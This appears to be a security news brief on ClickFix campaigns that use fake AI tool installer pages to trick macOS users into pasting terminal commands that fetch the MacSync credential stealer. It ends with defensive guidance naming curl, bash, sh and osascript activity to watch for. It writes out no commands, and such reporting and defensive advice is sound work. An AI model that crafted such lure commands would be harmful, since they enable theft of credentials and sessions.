Researchers have identified three separate ClickFix campaigns delivering a macOS information stealer called MacSync through fake AI tool installers, according to The Hacker News. The attacks do not rely on a software flaw. Instead, they trick users into copying and executing terminal commands, which then fetch and run the malware.
The technique marks a continued shift toward social-engineering-led malware delivery on macOS. In these campaigns, victims are lured by bogus AI or productivity software pages and told to complete installation steps manually. Once executed, the command chain can download MacSync, a stealer designed to harvest browser credentials, cookies, autofill data, wallet information, and other system details commonly used for account takeover or follow-on intrusion.
The main risk is that the attack bypasses the assumptions many users make about malware infections. There is no exploit, no drive-by download, and often no obvious warning beyond the request to paste a command into Terminal. That user-driven execution can also reduce the effectiveness of defenses focused on malicious binaries or browser exploits. For companies, a compromised Mac could expose cloud sessions, email accounts, internal apps, and even VPN access if credentials or tokens are stored locally.
ClickFix-style attacks have grown across platforms over the past two years, often using fake CAPTCHA pages, browser update prompts, or software setup screens. The MacSync activity shows the same playbook now being adapted to the strong demand for AI tools, where users may be more willing to install apps from unfamiliar sites and follow unusual setup instructions.
Defenders should watch for suspicious terminal activity involving tools such as curl, bash, sh, or osascript, along with unexpected LaunchAgent creation and unusual outbound connections from user devices. The simplest user guidance remains effective: legitimate software should not require copying shell commands from a website just to install.
